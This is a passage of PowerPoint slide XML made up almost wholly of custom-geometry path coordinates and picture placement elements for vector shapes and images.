                  <a:lnTo>
                    <a:pt x="199747" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210415" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="276801" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254896" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254896" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="277410" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254286" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254286" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="41086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301998" y="87172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310288" y="94060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316608" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328922" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332133" y="95605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337395" y="94914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339875" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="93837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329369" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327296" y="80548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323436" y="77764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322867" y="76341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322257" y="74919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="73334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="41086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="78902"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="340403" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339692" y="79308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338411" y="79755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334734" y="80731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333250" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="78902"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290944" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290944" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="6807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="6807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="6807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="424102" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="400672" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400672" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423423" y="94088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440845" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450164" y="95759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434932" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430833" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429798" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425402" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424169" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424102" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="481079" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="457650" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457650" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456395" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456309" y="71708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450924" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446677" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478523" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480433" y="69645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481074" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481079" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="502131" y="72887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="500140" y="72887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500140" y="90850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503127" y="92232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507089" y="93491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516965" y="95747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522472" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528547" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525682" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522614" y="81421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503228" y="73659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502131" y="72887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="540313" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="535212" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525683" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527008" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520775" y="26034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514822" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509751" y="30926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503553" y="35275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500444" y="40721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500494" y="52526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529035" y="69595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531229" y="69981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532855" y="70347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536249" y="71038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538545" y="71749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540983" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="74492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="77967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540556" y="79369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536431" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533241" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563811" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563925" y="68010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562543" y="64007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536736" y="51693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534338" y="51246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528080" y="49946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525499" y="49113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523325" y="47406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="46166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="42773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523975" y="41391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528791" y="39461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531758" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="29260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558194" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554537" y="26984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545189" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540313" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="560816" y="38973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="539520" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543726" y="39664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552017" y="42468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555715" y="44277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558946" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="614359" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="578217" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575629" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576311" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600103" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600314" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608338" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617997" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623300" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628116" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636874" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613079" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607572" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600074" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598042" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597717" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647445" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597656" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597965" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597981" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599505" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602208" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604854" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608385" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643019" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639353" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634648" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628914" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622541" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623501" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614359" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="646445" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="644027" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638093" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629437" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624966" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="643290" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="617123" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620455" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622609" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624743" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625800" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625881" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626003" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647203" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645819" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645746" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645635" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="687532" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="665627" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665627" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690275" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692856" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697611" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="708099" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710677" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712160" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713212" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="705708" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703626" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696514" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692348" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="26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5161034C-B5A1-D00D-350A-793BEB96341B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6754365" y="4045118"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="639009" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340704" y="477832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="370471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="128530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639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36C9790C-CF30-798B-FD5A-B444360030A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7096584" y="4172137"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="332667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319504" y="294864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537555" y="257061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610239" y="244964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629924" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639009" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635981" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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4" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84FD9D6B-0F32-B57F-C85C-2C63A3008018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54365" y="4046630"/>
              <a:ext cx="970628" cy="476320"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF0ADDA-774D-A145-6FF3-0742F368DA6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46037" y="3514946"/>
              <a:ext cx="1400663" cy="1160244"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17964920-9145-1C82-DB31-196790BEA2E3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45039" y="3648941"/>
              <a:ext cx="443672" cy="491441"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366CC82F-82E9-F241-3B9A-AE8C304C2BAF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06943" y="4203892"/>
              <a:ext cx="198365" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F42AE0F2-48BE-8C06-1D37-7135F064249A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7258608" y="3845517"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
                    <a:pt x="158995" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171109" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186251" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198365" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204422" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208965" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215022" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222593" y="34778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225621" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211993" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202908" y="142139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196851" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190794" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184737" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177166" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169595" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162023" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152938" y="223794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143852" y="231355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137795" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131738" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127196" y="237403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121139" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116596" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102968" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93882" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84797" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75712" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66626" y="225306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51484" y="219258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="213209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34827" y="210185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30284" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25742" y="201112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21199" y="196576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="185991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="173894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140627"/>
